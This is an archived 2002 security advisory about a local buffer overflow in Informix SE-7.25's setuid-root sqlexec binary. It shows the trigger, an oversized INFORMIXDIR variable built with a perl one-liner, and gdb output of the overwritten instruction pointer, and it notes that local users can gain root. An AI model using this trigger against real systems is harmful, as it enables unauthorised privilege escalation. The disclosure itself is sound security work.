TUCoPS :: Linux :: Apps A-M :: lnx5384.htm

Informix local Buffer overflow
31th May 2002 [SBWID-5384]
COMMAND

	Informix local Buffer overflow

SYSTEMS AFFECTED

	 Informix SE-7.25

	 Platform: Only tested in Linux but can be exported to others.

	

PROBLEM

	Juan Manuel Pascual Escriba [pask@uninet.edu] found following bug:
	

	Buffer overflow exists if INFORMIXDIR  enviroment  variable  is  defined
	with a size greater than 2023 bytes
	

	

	[pask@dimoni lib]$ ls -FAlsc

	total 2588

	   4 drwxrwxr-x    2 informix informix     4096 May 28 22:50 boom/

	1484 -rwsr-sr-x    1 root     informix  1515480 Apr 20 22:09 sqlexec*

	 504 -rwxr-xr-x    1 informix informix   510283 Apr 20 22:09 sqlexecd*

	 596 -rwxr-xr-x    1 informix informix   606041 Apr 20 22:09 sqlrm*

	

	[pask@dimoni lib]$ export INFORMIXDIR=`perl -e \'print \"A\"x2023\'` 

	[pask@dimoni lib]$ ./sqlexec

	[pask@dimoni lib]$ export INFORMIXDIR=`perl -e \'print \"A\"x2024\'`

	[pask@dimoni lib]$ ./sqlexec

	Segmentation fault

	

	[pask@dimoni lib]$ gdb ./sqlexec

	(gdb) r

	Starting program: /home/informix/SE-7.25/lib/./sqlexec

	Program received signal SIGSEGV, Segmentation fault.

	0x41414141 in ?? ()

	(gdb)

	(gdb) info registers

	...

	esp            0x3fffed08       0x3fffed08

	ebp            0x41414141       0x41414141

	esi            0x3fffedf9       1073737209

	edi            0x8191571        135861617

	eip            0x41414141       0x41414141

	...

	

	

	

	 IMPACT:

	 =======

	

	Users with exec perm over /lib/sqlexec can obtain euid=0 in  a  standard
	installation of Informix SE-7.25
	

	

SOLUTION

	Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH